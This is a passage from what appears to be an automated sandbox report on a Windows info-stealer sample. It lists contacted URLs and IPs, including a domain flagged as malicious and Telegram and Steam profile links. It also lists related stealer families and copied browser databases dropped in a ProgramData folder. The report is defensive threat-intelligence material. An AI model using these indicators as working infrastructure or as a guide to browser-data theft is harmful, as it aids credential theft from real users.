                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1990989469.0000000003BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://go.f.goldenloafuae.com/zSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415731105.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415703142.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://go.f.goldenloafuae.comSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://www.google.com/images/branding/product/ico/googleg_alldp.icoSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989813367.000000000356B000.00000004.00000020.00020000.00000000.sdmp, kfuaiw.1.drfalse
                                                    		high
                                                    https://go.f.goldenloafuae.comVSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/v20SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989813367.000000000356B000.00000004.00000020.00020000.00000000.sdmp, kfuaiw.1.drfalse
                                                      		high
                                                      https://t.me/l793oyESecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.000000000047E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://go.f.goldenloafuae.comXSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1349855443.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drfalse
                                                          		high
                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYim7ymoh.1.drfalse
                                                            		high
                                                            https://go.f.goldenloafuae.com/%SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://duckduckgo.com/chrome_newtabv20SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989813367.000000000356B000.00000004.00000020.00020000.00000000.sdmp, kfuaiw.1.drfalse
                                                              		high
                                                              https://go.f.goldenloafuae.com/dSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415731105.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1385868320.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415703142.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1385816045.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989813367.000000000356B000.00000004.00000020.00020000.00000000.sdmp, kfuaiw.1.drfalse
                                                                		high
                                                                https://go.f.goldenloafuae.com/gSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1440465464.000000000051F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://support.mozilla.org/products/firefoxgro.allSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1990989469.0000000003BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=kfuaiw.1.drfalse
                                                                    		high
                                                                    https://go.f.goldenloafuae.com/TSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1440465464.000000000051F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://gemini.google.com/app?q=kfuaiw.1.drfalse
                                                                        		high
                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drfalse
                                                                          		high
                                                                          https://steamcommunity.com/profiles/76561199829660832ir7amMozilla/5.0SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exefalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            142.250.186.68
                                                                            		www.google.comUnited States
                                                                            		15169GOOGLEUSfalse
                                                                            95.217.27.252
                                                                            		go.f.goldenloafuae.comGermany
                                                                            		24940HETZNER-ASDEtrue
                                                                            149.154.167.99
                                                                            		t.meUnited Kingdom
                                                                            		62041TELEGRAMRUfalse

                                                                            Private

                                                                            IP
                                                                            192.168.2.4
                                                                            127.0.0.1

                                                                            General Information

                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1632195
                                                                            Start date and time:2025-03-07 20:44:07 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 5m 41s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:14
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@22/16@4/5
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 99%
                                                                            • Number of executed functions: 66
                                                                            • Number of non-executed functions: 50
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 199.232.214.172, 142.250.185.195, 142.250.185.78, 74.125.133.84, 216.58.206.78, 142.250.186.142, 142.250.185.163, 142.250.184.206, 142.250.186.110, 23.199.214.10
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, c.pki.goog
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            No simulations

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            95.217.27.252file.exeGet hashmaliciousVidarBrowse
                                                                              LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                q3na5Mc.exeGet hashmaliciousVidarBrowse
                                                                                  ESVoO7ywn5.exeGet hashmaliciousVidarBrowse
                                                                                    149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                                                                                    • telegram.org/img/emoji/40/F09F9889.png
                                                                                    http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                    • telegram.org/img/favicon.ico
                                                                                    http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                    • telegram.org/
                                                                                    http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                    • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                    http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                    • telegram.org/
                                                                                    http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                    • telegram.org/
                                                                                    http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                    • telegram.org/?setln=pl
                                                                                    http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                    • telegram.org/
                                                                                    http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                    • telegram.dog/
                                                                                    LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                    • t.me/cinoshibot

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    t.mefile.exeGet hashmaliciousVidarBrowse
                                                                                    • 149.154.167.99
                                                                                    LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                    • 149.154.167.99
                                                                                    https://graph.org/WBACK-03-06?qb3nGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.99
                                                                                    EasyWay.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 149.154.167.99
                                                                                    Collapse.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                                    • 149.154.167.99
                                                                                    q3na5Mc.exeGet hashmaliciousVidarBrowse
                                                                                    • 149.154.167.99
                                                                                    Yanto v1.2.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 149.154.167.99
                                                                                    ESVoO7ywn5.exeGet hashmaliciousVidarBrowse
                                                                                    • 149.154.167.99
                                                                                    S2W2ftXM2b.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, XWormBrowse
                                                                                    • 149.154.167.99
                                                                                    dealmaker.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 149.154.167.99
                                                                                    go.f.goldenloafuae.comfile.exeGet hashmaliciousVidarBrowse
                                                                                    • 95.217.27.252
                                                                                    LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                    • 95.217.27.252

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    TELEGRAMRUXiJhd7Lx30.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    file.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                    • 149.154.167.220
                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                    • 149.154.167.99
                                                                                    LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                    • 149.154.167.99
                                                                                    Shipment advice H-BL Draft.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    valorant_ESP_aimbot.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    georgefloyd.batGet hashmaliciousXWormBrowse
                                                                                    • 149.154.167.220
                                                                                    ZTEIhNCtP3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    uPDwUy9ewY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    HETZNER-ASDEfile.exeGet hashmaliciousVidarBrowse
                                                                                    • 95.217.27.252
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242
                                                                                    LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                    • 95.217.27.252
                                                                                    NEW ORDER (PO. 2100002 (BT-INC).xlsGet hashmaliciousUnknownBrowse
                                                                                    • 5.161.200.29
                                                                                    New Order.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 5.161.200.29
                                                                                    Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • 5.161.200.29
                                                                                    Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • 5.161.200.29
                                                                                    Doc9078786968795776764567.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • 5.161.200.29
                                                                                    NEW ORDER (PO. 2100002 (BT-INC).xlsGet hashmaliciousUnknownBrowse
                                                                                    • 5.161.200.29

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    28a2c9bd18a11de089ef85a160da29e4https://securefile395.outgrow.us/securefile395-9Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 204.79.197.222
                                                                                    capt1cha.exeGet hashmaliciousUnknownBrowse
                                                                                    • 204.79.197.222
                                                                                    NEW__Review_202591760.svgGet hashmaliciousInvisible JSBrowse
                                                                                    • 204.79.197.222
                                                                                    SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeGet hashmaliciousXWormBrowse
                                                                                    • 204.79.197.222
                                                                                    https://www.logisticsacp.com/Get hashmaliciousUnknownBrowse
                                                                                    • 204.79.197.222
                                                                                    GGP_DOCUMENTO CITACION AUDIENCIA_GGP.svgGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                    • 204.79.197.222
                                                                                    http://lockbitspyakyequybgwgwauhzqxx7ba2gh3lmlj3zyeuaknrexdzfid.onionGet hashmaliciousUnknownBrowse
                                                                                    • 204.79.197.222
                                                                                    U0443.pdf.jsGet hashmaliciousRMSRemoteAdminBrowse
                                                                                    • 204.79.197.222
                                                                                    bdc2be5bddda548dec3c2d88464a698627ac9447aae621d8.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                    • 204.79.197.222
                                                                                    https://graph.org/WBACK-03-06?qb3nGet hashmaliciousUnknownBrowse
                                                                                    • 204.79.197.222
                                                                                    37f463bf4616ecd445d4a1937da06e19AQIu7JYa5r.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 95.217.27.252
                                                                                    • 149.154.167.99
                                                                                    employee record_pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 95.217.27.252
                                                                                    • 149.154.167.99
                                                                                    employee record_pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 95.217.27.252
                                                                                    • 149.154.167.99
                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                    • 95.217.27.252
                                                                                    • 149.154.167.99
                                                                                    [System Process]12.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                                                                    • 95.217.27.252
                                                                                    • 149.154.167.99
                                                                                    LtCPevm69G.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                    • 95.217.27.252
                                                                                    • 149.154.167.99
                                                                                    awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 95.217.27.252
                                                                                    • 149.154.167.99
                                                                                    awb_post_dhl_delivery_documents_07_03_2025_000000000000000.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 95.217.27.252
                                                                                    • 149.154.167.99
                                                                                    mQRr8Rkorf.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                    • 95.217.27.252
                                                                                    • 149.154.167.99
                                                                                    V1CCX70AZ8P70ADNI.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                    • 95.217.27.252
                                                                                    • 149.154.167.99

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\ProgramData\9h4wb\37gd2d

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):98304
                                                                                    Entropy (8bit):0.08235737944063153
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\ProgramData\9h4wb\gdtrqi

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):126976
                                                                                    Entropy (8bit):0.47147045728725767
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\ProgramData\9h4wb\kfuaiw

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
                                                                                    Category:dropped
                                                                                    Size (bytes):139264
                                                                                    Entropy (8bit):1.1366509594298093
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
                                                                                    MD5:C5CFBCA422AD1353E7116A02424C59FD
                                                                                    SHA1:38F032839FC5E1F890FAA636390A3CC9556AD350
                                                                                    SHA-256:F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
                                                                                    SHA-512:94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\ProgramData\9h4wb\m7ymoh

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):9571
                                                                                    Entropy (8bit):5.536643647658967
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                    MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                    SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                    SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                    SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                    Malicious:false
                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                    C:\ProgramData\9h4wb\ozcb1d2no

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):40960
                                                                                    Entropy (8bit):0.8616778647394084
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
                                                                                    MD5:BDDE4AD11E732420E7ABCCA946B11611
                                                                                    SHA1:278C3386A37BAFCA507CF4C128600B01B312DDA0
                                                                                    SHA-256:099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
                                                                                    SHA-512:B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\ProgramData\9h4wb\s2n7gd268

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                    Category:dropped
                                                                                    Size (bytes):49152
                                                                                    Entropy (8bit):0.8180424350137764
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\ProgramData\9h4wb\u3ecje

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):294912
                                                                                    Entropy (8bit):0.08436842005578409
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                    MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                    SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                    SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                    SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\ProgramData\9h4wb\v3wbai

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, file counter 6, database pages 41, 1st free page 29, free pages 1, cookie 0x25, schema 4, UTF-8, version-valid-for 6
                                                                                    Category:dropped
                                                                                    Size (bytes):196608
                                                                                    Entropy (8bit):0.4792253015780342
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:xWpdkG7xQ+ALqL/uejzH+bF+UIYysX0lj/twfLyl0e9S8E:ApdkG77IqL/tH+bF+UI3i67Kylj9
                                                                                    MD5:33642526D21BAF34FB5D5AAF11B3FB91
                                                                                    SHA1:A64B4A7605D8B449C085474A3484921975EF6C14
                                                                                    SHA-256:3ED06184837C7FF625C54589CA2037F127E0525E3541DE8960A9D5503625862B
                                                                                    SHA-512:A013359FCBAC1005653793D3FF6398E32746E2F6FFCDA26AA3C9EB96279F7A2E989E05B5B8D2510EAF5F93DDD6281A71773DA81C472FCC71AD74315353948782
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......)...........%......................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\ProgramData\9h4wb\xlng4w

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):114688
                                                                                    Entropy (8bit):0.9746603542602881
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                    Malicious:false
